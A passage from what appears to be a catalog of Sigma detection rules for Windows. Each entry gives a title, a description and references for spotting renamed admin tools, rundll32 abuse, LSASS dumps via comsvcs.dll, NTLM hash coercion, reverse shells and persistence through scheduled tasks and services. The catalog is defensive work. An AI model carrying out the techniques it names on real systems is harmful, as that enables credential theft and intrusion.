https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md |
Renamed AutoHotkey.EXE Execution |
Detects execution of a renamed autohotkey.exe binary based on PE metadata fields |
https://www.autohotkey.com/download/, https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/ |
Renamed AutoIt Execution |
Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.
AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.
Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.
|
https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w, https://www.autoitscript.com/site/ |
Potential Defense Evasion Via Binary Rename |
Detects the execution of a renamed binary often used by attackers or malware, leveraging the new Sysmon OriginalFileName data point. |
https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process |
Potential Defense Evasion Via Rename Of Highly Relevant Binaries |
Detects the execution of a renamed binary often used by attackers or malware, leveraging the new Sysmon OriginalFileName data point. |
https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks, https://twitter.com/christophetd/status/1164506034720952320, https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ |
Renamed BOINC Client Execution |
Detects the execution of a renamed BOINC binary. |
https://boinc.berkeley.edu/, https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Renamed BrowserCore.EXE Execution |
Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) |
https://twitter.com/mariuszbit/status/1531631015139102720 |
Renamed Cloudflared.EXE Execution |
Detects the execution of a renamed "cloudflared" binary. |
https://github.com/cloudflare/cloudflared/releases, https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/ |
Renamed CreateDump Utility Execution |
Detects the use of a renamed legitimate createdump.exe LOLBIN utility to dump process memory |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960 |
Renamed CURL.EXE Execution |
Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields |
https://twitter.com/Kostastsale/status/1700965142828290260 |
Renamed ZOHO Dctask64 Execution |
Detects the execution of a renamed "dctask64.exe", a binary signed by ZOHO Corporation and part of ManageEngine Endpoint Central.
This binary can be abused for DLL injection, arbitrary command and process execution.
|
https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424 |
Renamed FTP.EXE Execution |
Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields |
https://lolbas-project.github.io/lolbas/Binaries/Ftp/ |
Renamed Gpg.EXE Execution |
Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. |
https://securelist.com/locked-out/68960/ |
Renamed Jusched.EXE Execution |
Detects the execution of a renamed "jusched.exe" as seen used by the Cobalt group |
https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf |
Renamed Mavinject.EXE Execution |
Detects the execution of a renamed version of the "Mavinject" process, which can be abused to perform process injection using the "/INJECTRUNNING" flag |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection |
Renamed MegaSync Execution |
Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. |
https://redcanary.com/blog/rclone-mega-extortion/ |
Renamed Msdt.EXE Execution |
Detects the execution of a renamed "Msdt.exe" binary |
https://lolbas-project.github.io/lolbas/Binaries/Msdt/ |
Renamed Microsoft Teams Execution |
Detects the execution of a renamed Microsoft Teams binary. |
Internal Research |
Renamed NetSupport RAT Execution |
Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings |
https://redcanary.com/blog/misbehaving-rats/ |
Renamed NirCmd.EXE Execution |
Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. |
https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.nirsoft.net/utils/nircmd.html |
Renamed Office Binary Execution |
Detects the execution of a renamed office binary |
https://infosec.exchange/@sbousseaden/109542254124022664 |
Renamed PAExec Execution |
Detects the execution of a renamed version of PAExec, which is often used by attackers |
https://www.poweradmin.com/paexec/, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf |
Renamed PingCastle Binary Execution |
Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. |
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.pingcastle.com/documentation/scanner/ |
Renamed Plink Execution |
Detects the execution of a renamed version of the Plink binary |
https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html |
Visual Studio NodejsTools PressAnyKey Renamed Execution |
Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries |
https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 |
Potential Renamed Rundll32 Execution |
Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection |
https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ |
Renamed Remote Utilities RAT (RURAT) Execution |
Detects execution of renamed Remote Utilities (RURAT) via Product PE header field |
https://redcanary.com/blog/misbehaving-rats/ |
Renamed SysInternals DebugView Execution |
Detects suspicious renamed SysInternals DebugView execution |
https://www.epicturla.com/blog/sysinturla |
Renamed ProcDump Execution |
Detects the execution of a renamed ProcDump executable.
This is often done by attackers or malware in order to evade defensive mechanisms.
|
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump |
Renamed PsExec Service Execution |
Detects the suspicious launch of a renamed version of the PSEXESVC service, which is not often used by legitimate administrators |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM |
Renamed Sysinternals Sdelete Execution |
Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) |
https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md |
Renamed Vmnat.exe Execution |
Detects a renamed vmnat.exe or a portable version that can be used for DLL side-loading |
https://twitter.com/malmoeb/status/1525901219247845376 |
Renamed Whoami Execution |
Detects the execution of whoami that has been renamed to a different name to avoid detection |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ |
Capture Credentials with Rpcping.exe |
Detects the use of Rpcping.exe to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. |
https://lolbas-project.github.io/lolbas/Binaries/Rpcping/, https://twitter.com/vysecurity/status/974806438316072960, https://twitter.com/vysecurity/status/873181705024266241, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11) |
Ruby Inline Command Execution |
Detects execution of ruby using the "-e" flag. This could be used as a way to launch a reverse shell or execute live ruby code. |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Potential Rundll32 Execution With DLL Stored In ADS |
Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). |
https://lolbas-project.github.io/lolbas/Binaries/Rundll32 |
Suspicious Advpack Call Via Rundll32.EXE |
Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function |
https://twitter.com/Hexacorn/status/1224848930795552769, http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ |
Suspicious Rundll32 Invoking Inline VBScript |
Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
Rundll32 InstallScreenSaver Execution |
An attacker may execute an application as an SCR file using rundll32.exe desk.cpl,InstallScreenSaver |
https://lolbas-project.github.io/lolbas/Libraries/Desk/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl |
Suspicious Key Manager Access |
Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) |
https://twitter.com/NinjaParanoid/status/1516442028963659777 |
Rundll32 Execution Without CommandLine Parameters |
Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity |
https://www.cobaltstrike.com/help-opsec, https://twitter.com/ber_m1ng/status/1397948048135778309 |
Mshtml.DLL RunHTMLApplication Suspicious Usage |
Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
|
https://twitter.com/n1nj4sec/status/1421190238081277959, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt, http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt |
Suspicious NTLM Authentication on the Printer Spooler Service |
Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service |
https://twitter.com/med0x2e/status/1520402518685200384, https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml |
Potential Obfuscated Ordinal Call Via Rundll32 |
Detects execution of "rundll32" with potential obfuscated ordinal calls |
Internal Research |
Rundll32 Spawned Via Explorer.EXE |
Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. |
https://redcanary.com/blog/raspberry-robin/, https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Process Memory Dump Via Comsvcs.DLL |
Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) |
https://twitter.com/shantanukhande/status/1229348874298388484, https://twitter.com/pythonresponder/status/1385064506049630211?s=21, https://twitter.com/Hexacorn/status/1224848930795552769, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/, https://twitter.com/SBousseaden/status/1167417096374050817, https://twitter.com/Wietze/status/1542107456507203586, https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py |
Rundll32 Registered COM Objects |
Detects rundll32.exe being used to load malicious registered COM objects |
https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md |
Suspicious Process Start Locations |
Detects suspicious process run from unusual locations |
https://car.mitre.org/wiki/CAR-2013-05-002 |
Suspicious Rundll32 Setupapi.dll Activity |
The setupapi.dll library provides the InstallHinfSection function for processing INF files. An INF file may contain instructions that create values in the registry, modify files and install drivers. This technique could be used to obtain persistence by modifying one of the Run or RunOnce registry keys, run a process, or use other DLL chain calls (see references). The InstallHinfSection function in setupapi.dll calls the runonce.exe executable regardless of the actual content of the INF file. |
https://lolbas-project.github.io/lolbas/Libraries/Setupapi/, https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf, https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf, https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20 |
Shell32 DLL Execution in Suspicious Directory |
Detects shell32.dll executing a DLL in a suspicious directory |
https://www.group-ib.com/resources/threat-research/red-curl-2.html |
Potential ShellDispatch.DLL Functionality Abuse |
Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" |
https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/ |
RunDLL32 Spawning Explorer |
Detects RunDLL32.exe spawning explorer.exe as a child process, which is very uncommon; Gamarue has often been observed spawning the explorer.exe process in this unusual way |
https://redcanary.com/blog/intelligence-insights-november-2021/ |
Potentially Suspicious Rundll32 Activity |
Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities |
http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/, https://twitter.com/Hexacorn/status/885258886428725250, https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://twitter.com/nas_bench/status/1433344116071583746, https://twitter.com/eral4m/status/1479106975967240209, https://twitter.com/eral4m/status/1479080793003671557 |
Suspicious Control Panel DLL Load |
Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits |
https://twitter.com/rikvduijn/status/853251879320662017, https://twitter.com/felixw3000/status/853354851128025088 |
Suspicious Rundll32 Execution With Image Extension |
Detects the execution of Rundll32.exe with DLL files masquerading as image files |
https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution |
Suspicious Usage Of ShellExec_RunDLL |
Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the Raspberry Robin attack |
https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009 |
Suspicious ShellExec_RunDLL Call Via Ordinal |
Detects a suspicious call to the "ShellExec_RunDLL" exported function of SHELL32.DLL through its ordinal number to launch other commands.
Adversaries might use only the ordinal number in order to bypass existing detections that alert on the usage of ShellExec_RunDLL on the command line.
|
https://redcanary.com/blog/raspberry-robin/, https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/, https://github.com/SigmaHQ/sigma/issues/1009, https://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html |
ShimCache Flush |
Detects actions that clear the local ShimCache and remove forensic evidence |
https://medium.com/@blueteamops/shimcache-flush-89daff28d15e |
Suspicious Rundll32 Activity Invoking Sys File |
Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452 |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
Potentially Suspicious Rundll32.EXE Execution of UDL File |
Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.
Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.
|
https://trustedsec.com/blog/oops-i-udld-it-again |
Rundll32 Execution With Uncommon DLL Extension |
Detects the execution of rundll32 with a command line that doesn't contain a common extension |
https://twitter.com/mrd0x/status/1481630810495139841?s=12 |
Rundll32 UNC Path Execution |
Detects rundll32 execution where the DLL is located on a remote location (share) |
https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code |
Suspicious Workstation Locking via Rundll32 |
Detects a suspicious call to the user32.dll function that locks the user workstation |
https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/ |
Suspicious Modification Of Scheduled Tasks |
Detects when an attacker tries to modify an already existing scheduled task to run from a suspicious location.
Attackers can create a simple-looking task in order to avoid detection on creation, as creation is often the most closely monitored event.
Instead, they modify the task after creation to include their malicious payload.
|
Internal Research, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks |
Suspicious WebDav Client Execution Via Rundll32.EXE |
Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server), or potentially a sign of exploitation of CVE-2023-23397.
|
https://twitter.com/aceresponder/status/1636116096506818562, https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/, https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/, https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png, https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ |
WebDav Client Execution Via Rundll32.EXE |
Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie".
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).
|
https://github.com/OTRF/detection-hackathon-apt29/issues/17, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md |
Rundll32 Execution Without Parameters |
Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module |
https://bczyz1.github.io/2021/01/30/psexec.html |
Run Once Task Execution as Configured in Registry |
Detects the execution of a Run Once task as configured in the registry |
https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/, https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA |
Suspicious Schtasks Execution AppData Folder |
Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Scheduled Task Creation Via Schtasks.EXE |
Detects the creation of scheduled tasks by user accounts via the "schtasks" utility. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create |
Suspicious Scheduled Task Creation Involving Temp Folder |
Detects the creation of scheduled tasks that involves a temporary folder and runs only once |
https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 |
Delete Important Scheduled Task |
Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities |
Internal Research |
Delete All Scheduled Tasks |
Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete |
Disable Important Scheduled Task |
Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task, https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ |
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE |
Detects scheduled task creations that point to a suspicious folder or an environment variable often used by malware |
https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/, https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04, https://blog.talosintelligence.com/gophish-powerrat-dcrat/ |
Schtasks From Suspicious Folders |
Detects scheduled task creations that have suspicious action command and folder combinations |
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical |
Suspicious Scheduled Task Name As GUID |
Detects creation of a scheduled task with a GUID-like name |
https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Uncommon One Time Only Scheduled Task At 00:00 |
Detects scheduled task creation events that include suspicious actions and are run once at 00:00 |
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte |
Potential Persistence Via Microsoft Compatibility Appraiser |
Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks in order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
|
https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/ |
Potential Persistence Via Powershell Search Order Hijacking - Task |
Detects suspicious PowerShell execution via a scheduled task where the command ends with suspicious flags that hide the PowerShell instance instead of executing scripts or commands. This could be a sign of persistence via the PowerShell "Get-Variable" technique as seen being used in Colibri Loader |
https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/ |
Scheduled Task Executing Payload from Registry |
Detects the creation of a schtask that potentially executes a payload stored in the Windows Registry using PowerShell. |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Scheduled Task Executing Encoded Payload from Registry |
Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell. |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Suspicious Schtasks Schedule Types |
Detects scheduled task creations or modifications with a suspicious schedule type |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
Suspicious Schtasks Schedule Type With High Privileges |
Detects scheduled task creations or modifications set to run with high privileges on a suspicious schedule type |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create |
Suspicious Scheduled Task Creation via Masqueraded XML File |
Detects the creation of a scheduled task using the "-XML" flag with a file that lacks the '.xml' extension. This behavior could be indicative of a potential defense evasion attempt during persistence |
https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-, https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml |
Suspicious Command Patterns In Scheduled Task Creation |
Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands |
https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/, https://twitter.com/RedDrip7/status/1506480588827467785, https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf |
Schtasks Creation Or Modification With SYSTEM Privileges |
Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges |
https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks |
Script Event Consumer Spawning Process |
Detects a suspicious child process of Script Event Consumer (scrcons.exe). |
https://redcanary.com/blog/child-processes/, https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html |
Possible Privilege Escalation via Weak Service Permissions |
Detects the sc.exe utility being spawned by a user with Medium integrity level to change a service's ImagePath or FailureCommand |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://pentestlab.blog/2017/03/30/weak-service-permissions/ |
New Service Creation Using Sc.EXE |
Detects the creation of a new service using the "sc.exe" utility. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md |
Service StartupType Change Via Sc.EXE |
Detects the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" |
https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
New Kernel Driver Via SC.EXE |
Detects creation of a new service (kernel driver) with the type "kernel" |
https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ |
Interesting Service Enumeration Via Sc.EXE |
Detects the enumeration and query of interesting and in some cases sensitive services on the system via "sc.exe".
Attackers often try to enumerate the services currently running on a system in order to find different attack vectors.
|
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/, https://pentestlab.blog/tag/svchost/ |
Allow Service Access Using Security Descriptor Tampering Via Sc.EXE |
Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. |
https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings |
Deny Service Access Using Security Descriptor Tampering Via Sc.EXE |
Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. |
https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/, https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings |
Service DACL Abuse To Hide Services Via Sc.EXE |
Detects usage of the "sc.exe" utility to add a new service with special permissions, as seen used by threat actors, which make the service hidden and unremovable. |
https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ |
Service Security Descriptor Tampering Via Sc.EXE |
Detects the sc.exe utility adding a new service with special permissions which hide that service. |
https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html, https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://twitter.com/Alh4zr3d/status/1580925761996828672, https://twitter.com/0gtweet/status/1628720819537936386, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ |
Suspicious Service Path Modification |
Detects service path modification via the "sc" binary to a suspicious command or path |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html |
Potential Persistence Attempt Via Existing Service Tampering |
Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. |
https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/ |
Stop Windows Service Via Sc.EXE |
Detects the stopping of a Windows service via the "sc.exe" utility |
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742107(v=ws.11) |
Potential Shim Database Persistence via Sdbinst.EXE |
Detects installation of a new shim using sdbinst.exe.
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
|
https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence |
Uncommon Extension Shim Database Installation Via Sdbinst.EXE |
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md |
Sdclt Child Processes |
A general detection for sdclt spawning new processes. This could be an indicator of sdclt being used in UAC bypass techniques. |
https://github.com/OTRF/detection-hackathon-apt29/issues/6, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md |
Sdiagnhost Calling Suspicious Child Process |
